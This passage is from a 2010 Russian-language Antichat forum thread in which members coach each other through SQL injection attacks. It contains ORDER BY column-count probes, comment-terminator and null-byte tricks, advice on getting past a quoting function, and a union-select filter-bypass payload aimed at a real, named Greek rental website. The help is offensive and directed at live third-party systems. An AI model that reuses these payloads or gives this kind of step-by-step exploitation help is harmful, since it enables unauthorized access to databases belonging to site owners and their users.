HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12651  
Старый 20.04.2010, 21:40
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от YuNi|[c  
привет посоветуйте как тут поступит:
на запрос localhost/script.php?id=1'+order+by+1+--+

ответ:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'order+by+1+--+', now())'
at line 2
вот никак не могу раскрутит еще добавка now())'

localhost/script.php?id=1'%20order%20by%201--
 
Ответить с цитированием

  #12652  
Старый 20.04.2010, 22:34
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

спс попугай но все еще остался now())

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2
 
Ответить с цитированием

  #12653  
Старый 21.04.2010, 01:22
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от YuNi|[c  
спс попугай но все еще остался now())

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '', now())' at line 2

попробуй пробелы поставить до и\или после двух тире, либо /* заюзай, или нульбайтом отрежь на крайний случай.

А вообще, похоже ошибка идет во втором запросе, видимо.
 
Ответить с цитированием

  #12654  
Старый 21.04.2010, 07:53
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

%23, #, /*.
1' order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
1 order by 1,2,3,4,5,6,7,8,9,10,11,12 /*
С ковычкой без и т.п.
 
Ответить с цитированием

  #12655  
Старый 21.04.2010, 11:59
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

99% что это инсерт или апдейт. Крутить соответственно
 
Ответить с цитированием

  #12656  
Старый 21.04.2010, 14:07
slayzer
Новичок
Регистрация: 30.04.2009
Сообщений: 9
С нами: 8963907

Репутация: 0
По умолчанию

Господа, есть варианты обхода экранирования ?)


statement := 'SELECT * FROM users WHERE name = ' + QuoteParam(userName) + ';';


function QuoteParam(s : string) : string;
{ на входе — строка; на выходе — строка в кавычках и с заменёнными спецсимволами }
var
i : integer;
Dest : string;
begin
Dest := '"';
for i:=1 to length(s) do
case s[i] of
'''' : Dest := Dest + '\''';
'"' : Dest := Dest + '\"';
'\' : Dest := Dest + '\\';
else Dest := Dest + s[i];
end;
QuoteParam := Dest + '"';
end;


+ к переменной можно добавить intval()
 
Ответить с цитированием

  #12657  
Старый 21.04.2010, 14:10
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Как бы там кавычки не мешаються, name= dasjkhasdjkhsjkhasdkhkajh union select 1, etc...
 
Ответить с цитированием

  #12658  
Старый 21.04.2010, 18:55
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

как можно обойти фильтрацию на select? полей 4

http://www.alpharent.gr/gr/offers.php?id=1
 
Ответить с цитированием

  #12659  
Старый 21.04.2010, 19:12
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

pinch:
Цитата:
http://www.alpharent.gr/gr/offers.php?id=-1+union+/*!select*/+0,1,2,3
 
Ответить с цитированием

  #12660  
Старый 21.04.2010, 19:29
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию

Какой функцией нужно делать поиск по БД?
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.